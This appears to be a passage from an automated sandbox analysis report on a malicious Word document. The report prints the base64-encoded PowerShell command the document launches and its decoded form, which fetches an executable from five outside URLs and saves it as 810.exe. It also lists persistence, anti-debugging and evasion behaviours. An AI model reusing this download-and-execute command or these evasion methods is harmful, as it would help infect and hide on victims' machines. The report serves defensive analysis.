Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJJump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\810.exeCode function: 6_2_00401A36 LoadLibraryA,GetProcAddress,6_2_00401A36
PE file contains sections with non-standard namesShow sources
Source: 810.exe.4.drStatic PE information: section name: .v0
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\810.exeCode function: 6_2_003E57E6 push C2680041h; ret 6_2_003E5BC8
Source: C:\Users\user\810.exeCode function: 6_2_003E57DB push C2680041h; ret 6_2_003E5BC8
Source: C:\Users\user\810.exeCode function: 6_2_0040BB02 push edi; retf 6_2_0040BB05
Source: C:\Users\user\810.exeCode function: 7_2_000F57DB push C2680041h; ret 7_2_000F5BC8
Source: C:\Users\user\810.exeCode function: 7_2_000F57E6 push C2680041h; ret 7_2_000F5BC8
Source: C:\Users\user\810.exeCode function: 7_2_0011BB02 push edi; retf 7_2_0011BB05
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002857E6 push C2680041h; ret 8_2_00285BC8
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002857DB push C2680041h; ret 8_2_00285BC8
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002ABB02 push edi; retf 8_2_002ABB05
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_000F57DB push C2680041h; ret 9_2_000F5BC8
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_000F57E6 push C2680041h; ret 9_2_000F5BC8
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_0011BB02 push edi; retf 9_2_0011BB05

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\startedradar.exeExecutable created and started: C:\Windows\System32\startedradar.exeJump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\810.exeJump to dropped file
Drops PE files to the user directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\810.exeJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\810.exePE file moved: C:\Windows\System32\startedradar.exeJump to behavior

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\810.exeJump to dropped file
Contains functionality to start windows servicesShow sources
Source: C:\Users\user\810.exeCode function: 7_2_0011FE73 StartServiceW,CloseServiceHandle,CloseServiceHandle,7_2_0011FE73

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\810.exeFile opened: C:\Windows\system32\startedradar.exe:Zone.Identifier read attributes | deleteJump to behavior
Starts Microsoft Word (often done to prevent that the user detects that something wrong)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Checks the free space of harddrivesShow sources
Source: C:\Users\user\810.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\810.exeCode function: EnumServicesStatusExW,GetTickCount,OpenServiceW,7_2_0011FA77
Source: C:\Users\user\810.exeCode function: EnumServicesStatusExW,GetLastError,7_2_0011FA14
Source: C:\Windows\System32\startedradar.exeCode function: EnumServicesStatusExW,GetLastError,9_2_0011FA14
Source: C:\Windows\System32\startedradar.exeCode function: EnumServicesStatusExW,GetTickCount,OpenServiceW,9_2_0011FA77
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\810.exeAPI coverage: 7.9 %
Source: C:\Windows\System32\startedradar.exeAPI coverage: 3.9 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\810.exe TID: 3804Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\startedradar.exe TID: 2516Thread sleep time: -60000s >= -30000sJump to behavior
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\810.exeCode function: 6_2_00401A36 LoadLibraryA,GetProcAddress,6_2_00401A36
Contains functionality to read the PEBShow sources
Source: C:\Users\user\810.exeCode function: 6_2_00401550 mov eax, dword ptr fs:[00000030h]6_2_00401550
Source: C:\Users\user\810.exeCode function: 7_2_00111550 mov eax, dword ptr fs:[00000030h]7_2_00111550
Source: C:\Windows\System32\startedradar.exeCode function: 8_2_002A1550 mov eax, dword ptr fs:[00000030h]8_2_002A1550
Source: C:\Windows\System32\startedradar.exeCode function: 9_2_00111550 mov eax, dword ptr fs:[00000030h]9_2_00111550
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\810.exeCode function: 6_2_003E2513 GetProcessHeap,GetProcessHeap,RtlAllocateHeap,lstrcmp,GetProcessHeap,HeapFree,6_2_003E2513
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $W9i2nI=('JlI'+'RB'+'JH');$IA95Y881=new-object Net.WebClient;$VPiZUTX=('http://'+'b'+'orsa'+'cat'+'.'+'c'+'om/9onr'+'kq'+'J@http'+':/'+'/chileve'+'n'+'.com/YAsy'+'S'+'0Mslz'+'@ht'+'tp:'+'//hu'+'y'+'u'+'s'+'ho'+'p'+'.com'+'/P2ryBfybD@h'+'ttp:/'+'/fat'+'re'+'cip'+'esdoc'+'.com/I20c'+'l'+'Mx8@ht'+'tp://id'+'jvn'+'.'+'com/eU'+'BrJ'+'ig7').Split('@');$YF4h4N=('jP9vP'+'03');$OHR2phSX = ('81'+'0');$UsYIQK=('c10F'+'It');$SNPwZfwZ=$env:userprofile+'\'+$OHR2phSX+('.'+'exe');foreach($mh1azSPq in $VPiZUTX){try{$
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Base64 decoded $W9i2nI=('JlI'+'RB'+'JH');$IA95Y881=new-object Net.WebClient;$VPiZUTX=('http://'+'b'+'orsa'+'cat'+'.'+'c'+'om/9onr'+'kq'+'J@http'+':/'+'/chileve'+'n'+'.com/YAsy'+'S'+'0Mslz'+'@ht'+'tp:'+'//hu'+'y'+'u'+'s'+'ho'+'p'+'.com'+'/P2ryBfybD@h'+'ttp:/'+'/fat'+'re'+'cip'+'esdoc'+'.com/I20c'+'l'+'Mx8@ht'+'tp://id'+'jvn'+'.'+'com/eU'+'BrJ'+'ig7').Split('@');$YF4h4N=('jP9vP'+'03');$OHR2phSX = ('81'+'0');$UsYIQK=('c10F'+'It');$SNPwZfwZ=$env:userprofile+'\'+$OHR2phSX+('.'+'exe');foreach($mh1azSPq in $VPiZUTX){try{$Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\810.exe 'C:\Users\user\810.exe' Jump to behavior
Source: C:\Users\user\810.exeProcess created: C:\Users\user\810.exe C:\Users\user\810.exeJump to behavior
Source: C:\Windows\System32\startedradar.exeProcess created: C:\Windows\System32\startedradar.exe C:\Windows\system32\startedradar.exeJump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJ
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwershell -e JABXADkAaQAyAG4ASQA9ACgAJwBKAGwASQAnACsAJwBSAEIAJwArACcASgBIACcAKQA7ACQASQBBADkANQBZADgAOAAxAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFYAUABpAFoAVQBUAFgAPQAoACcAaAB0AHQAcAA6AC8ALwAnACsAJwBiACcAKwAnAG8AcgBzAGEAJwArACcAYwBhAHQAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvADkAbwBuAHIAJwArACcAawBxACcAKwAnAEoAQABoAHQAdABwACcAKwAnADoALwAnACsAJwAvAGMAaABpAGwAZQB2AGUAJwArACcAbgAnACsAJwAuAGMAbwBtAC8AWQBBAHMAeQAnACsAJwBTACcAKwAnADAATQBzAGwAegAnACsAJwBAAGgAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AaAB1ACcAKwAnAHkAJwArACcAdQAnACsAJwBzACcAKwAnAGgAbwAnACsAJwBwACcAKwAnAC4AYwBvAG0AJwArACcALwBQADIAcgB5AEIAZgB5AGIARABAAGgAJwArACcAdAB0AHAAOgAvACcAKwAnAC8AZgBhAHQAJwArACcAcgBlACcAKwAnAGMAaQBwACcAKwAnAGUAcwBkAG8AYwAnACsAJwAuAGMAbwBtAC8ASQAyADAAYwAnACsAJwBsACcAKwAnAE0AeAA4AEAAaAB0ACcAKwAnAHQAcAA6AC8ALwBpAGQAJwArACcAagB2AG4AJwArACcALgAnACsAJwBjAG8AbQAvAGUAVQAnACsAJwBCAHIASgAnACsAJwBpAGcANwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABZAEYANABoADQATgA9ACgAJJump to behavior

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
